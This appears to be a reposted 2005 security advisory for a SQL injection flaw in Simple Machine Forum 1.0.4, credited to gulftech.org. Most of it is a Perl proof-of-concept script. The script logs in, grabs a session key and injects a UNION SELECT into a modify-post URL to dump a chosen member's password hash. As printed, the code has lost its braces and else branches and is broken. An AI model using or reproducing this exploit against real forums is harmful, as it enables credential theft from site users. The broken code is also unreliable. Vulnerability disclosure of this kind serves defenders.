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Simple Machine Forum SQL Injection (modify)
来源:http://www.gulftech.org 作者:James 发布时间:2005-06-24  

Simple Machine Forum SQL Injection (modify)

"Simple Machine Forum is a next-generation community software package and is jam-packed with features, while at the same time having a minimal impact on resources."

SQL Injection vulnerability discovered in Simple Machine Forum allows remote attackers to inject arbitrary SQL statements, the following exploit code will retrieve the password has of the user ID of the attacker's choosing.

The information has been provided by James.
The original article can be found at: http://www.gulftech.org

Vulnerable Systems:
* Simple Machine Forum version 1.0.4

#!/usr/bin/perl -w
# SMF Modify SQL Injection // All Versions // By James http://www.gulftech.org #
# Simple proof of concept for the modify post SQL Injection issue I discovered #
# in Simple Machine Forums. Supply this script with your username password and #
# the complete url to a post you made, and have permission to edit. 06/19/2005 #

use LWP::UserAgent;

if ( !$ARGV[3] )
print "Usage: smf.pl user pass target_uid modify_url\n";

print "##########################\n";
print "# Simple Machine Forums Modify Post SQL Injection #\n";
print "##########################\n";

my $user = $ARGV[0]; # your username
my $pass = $ARGV[1]; # your password
my $grab = $ARGV[2]; # the id of the target account
my $post = $ARGV[3]; # the entire url to modify a post you made
my $dump = '%20UNION%20SELECT%20memberName,0,passwd," . "0,0%20FROM%20smf_members%20WHERE%20ID_MEMBER=' . $grab . '/*';
$post =~ s/msg=([0-9]{1,10})/msg=$1$dump/;
my $path = ( $post =~ /^(.*)\/index\.php/) ? $1: die("[!] The post url you entered seems invalid!\n");

my $ua = new LWP::UserAgent;
$ua->agent("SMF Hash Grabber v1.0" . $ua->agent);


print "[*] Trying $path ...\n";

my $req = new HTTP::Request POST => $path . "/index.php?action=login2";
$req->content('user=' . $user . '&passwrd=' . $pass . '&cookielength=-1');
my $res = $ua->request($req);

print "[*] Logging In ...\n";

# When a correct login is made, a redirect is issued, and no
# text/html is sent to the browser really. We put 1024 to be
# safe. This part can be altered in case of modded installs!
if ( length($res->content) < 1024 )
print "[+] Successfully logged in as $user \n";
my $sid = $ua->get($path . '/index.php?action=profile;sa=account');

# We get our current session id to be used
print "[*] Trying To Get Valid Sesc ID \n";
if ( $sid->content =~ /sesc=([a-f0-9]{32})/ )
# Replace the old session parameter with the
# new one so we do not get an access denied!
my $sesc = $1;
$post =~ s/sesc=([a-f0-9]{32})/sesc=$sesc/;

print "[+] Valid Sesc Id : $sesc\n";
print "[*] Trying to get password hash ...\n";

my $pwn = $ua->get($post);
if ( $pwn->content =~ />([a-z0-9]{32})<\//i )
print "[+] Got the password hash!\n";
print "[+] Password Hash : $1\n";
print "[!] Exploit Failed! Try manually verifying the vulnerability \n";
print '[!] Unable to obtain a valid sesc key!!';
print '[!] There seemed to be a problem logging you in!';

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